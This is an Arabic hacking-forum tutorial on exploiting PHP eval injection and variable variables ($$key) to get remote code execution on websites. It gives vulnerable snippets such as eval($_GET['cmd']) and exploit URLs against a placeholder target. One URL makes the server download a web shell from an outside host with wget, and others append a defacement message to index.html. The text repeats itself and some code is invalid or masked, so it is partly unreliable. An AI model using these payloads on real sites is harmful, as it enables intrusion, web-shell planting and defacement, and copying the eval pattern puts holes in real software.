Dynamic Evaluation Variables | By Z3r0H4xor
السلام عليكم ورحمة الله وبركاتة
سلام يارجالة اخباركم ايه ؟
اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين
تمام الان نبدا بـ
الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval()
مثال
نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة
وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله
الاستغلال يحلوين يكون بهاذا الشكل ض1
نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه
الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .
مثال
هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10"
زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي "
طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"
وتستغل بهاذي الطريقة
&
طريقة الاستغلال
انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1
كتبتة لنة الملل سوا فايدة كبيرة خخخخ
grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members
سلام يارجالة اخباركم ايه ؟
اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين
PHP:
Dynamic Evaluation Variables
PHP:
Eval Injection
مثال
PHP:
$common-variable = "command";
$x = $_GET['arg'];
eval("\$common-variable = \$x;");
وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله
PHP:
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>
PHP:
http://www.target.com/php-files/input.php?cmd=wget www.mysite.com/shell.php
الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .
مثال
PHP:
$var**** = "myvar";
$$var**** = 10;
echo $myvar;
PHP:
$safevar = "Welcome to my site";
$param1 = "";
$param2 = "";
$param3 = "";
# my own "register globals" for param[1,2,3]
foreach ($_GET as $key => $value) {
$$key = $value;
echo $value;
}
طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"
وتستغل بهاذي الطريقة
PHP:
http://www.target.com/php-files/input.php?safevar=echo Hacked By z3r0>> /home/var/www/public_html/index.html
PHP:
$function-**** = "myfunction";
$Arg1 = "hello";
$Arg2 = "welcome to my site";
$$function-****("Arg1", "Arg2");
echo $myfunction;
PHP:
http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo Hacked By Z3r0 >> /home/var/www/public_html/index.html
كتبتة لنة الملل سوا فايدة كبيرة خخخخ
grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members
اسم الموضوع : Dynamic Evaluation Variables | By Z3r0H4xor
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات